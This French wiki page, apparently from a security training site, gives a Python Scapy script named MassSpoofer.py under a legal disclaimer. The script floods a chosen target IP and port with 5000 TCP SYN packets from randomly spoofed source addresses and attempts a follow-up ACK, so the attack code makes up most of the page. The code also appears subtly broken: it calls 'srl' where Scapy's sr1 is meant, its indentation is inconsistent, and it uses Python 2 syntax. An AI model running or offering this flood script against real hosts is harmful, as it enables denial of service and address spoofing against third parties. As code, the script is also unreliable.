MassSpoofer.py

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Sécurité — réseau
Technique Spoofing d'adresse IP / flood SYN
Dépendance Scapy
Usage massSpoofer.py <ip> <port>

Script Python utilisant Scapy pour émettre en masse des paquets TCP SYN avec des adresses IP source aléatoires (usurpation). Fourni à titre pédagogique.

#!/usr/bin/env python

import sys 
from scapy.all import *


# utilisation du programme 
# ./massSpoofer.py cible-IP cible-TCP-port 

def spoof(ipcible, portcible):
          spoof_ip = "%s.%s.%s.%s" % \
          (random.randint(128,168), random.randint(0,254), random.randint(0,254), random.randint(1,254) )
           spoof_port = random.randint(1,49151);
           print spoof_ip
           #creation du paquet IP 
           ip=IP(dst=ipcible,src=spoof_ip)
           # creation du paquet TCP SYN
           SYN=TCP(dport=int(portcible),sport=int(spoof_port),flags="S")
           # envoi du paquet SYN
           paquet=srl(ip/SYN)
           #creation du paquet ACK
           prochainACK = paquet.seq + 1 
           # creation du pacquet TCP SYNACK
           SYNACK=TCP(dport=int(portcible),sport=int(spoof_port),flags="A",ack=prochainACK,seq=1)
           send(ip/SYNACK)

for i in range(5000):
          spoof(sys.argv[1], sys.argv[2])

Voir aussi